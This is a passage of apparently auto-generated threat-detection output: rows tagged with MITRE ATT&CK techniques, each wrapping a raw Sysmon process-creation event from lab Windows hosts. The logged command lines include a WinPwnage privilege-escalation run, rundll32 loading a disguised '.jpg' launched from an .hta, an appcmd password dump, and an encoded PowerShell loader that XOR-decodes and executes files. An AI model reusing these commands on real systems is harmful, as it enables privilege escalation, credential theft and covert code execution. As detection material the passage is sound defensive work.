<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:38.241298Z"">
</TimeCreated>
<EventRecordID>6168</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:38.231</Data>
<Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
<Data Name=""ProcessId"">3256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c whoami /groups </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:08.346260Z"">
</TimeCreated>
<EventRecordID>556863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:08.339</Data>
<Data Name=""ProcessGuid"">747F3D96-1834-610F-0000-00105FE5D300</Data>
<Data Name=""ProcessId"">6576</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; c:\users\public\memViewData.jpg,PluginInit</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ParentProcessId"">9932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.784314Z"">
</TimeCreated>
<EventRecordID>5967</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.714</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010F2CFFF00</Data>
<Data Name=""ProcessId"">3844</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-11T23:22:26.650196Z"">
</TimeCreated>
<EventRecordID>142033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2896"" ThreadID=""3548"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-11 23:22:26.451</Data>
<Data Name=""ProcessGuid"">747F3D96-DE32-5EB9-0000-00103FC14300</Data>
<Data Name=""ProcessId"">5252</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">580</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:06:55.820406Z"">
</TimeCreated>
<EventRecordID>5435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:06:55.471</Data>
<Data Name=""ProcessGuid"">747F3D96-78DF-5D45-0000-0010EF400401</Data>
<Data Name=""ProcessId"">4320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-78DF-5D45-0000-0010BD350401</Data>
<Data Name=""ParentProcessId"">5756</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Dism.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\dism.exe&quot; /online /norestart /apply-unattend:&quot;C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.176666Z"">
</TimeCreated>
<EventRecordID>556726</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.121</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00100344D300</Data>
<Data Name=""ProcessId"">11196</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-90AF-610F-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">632</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
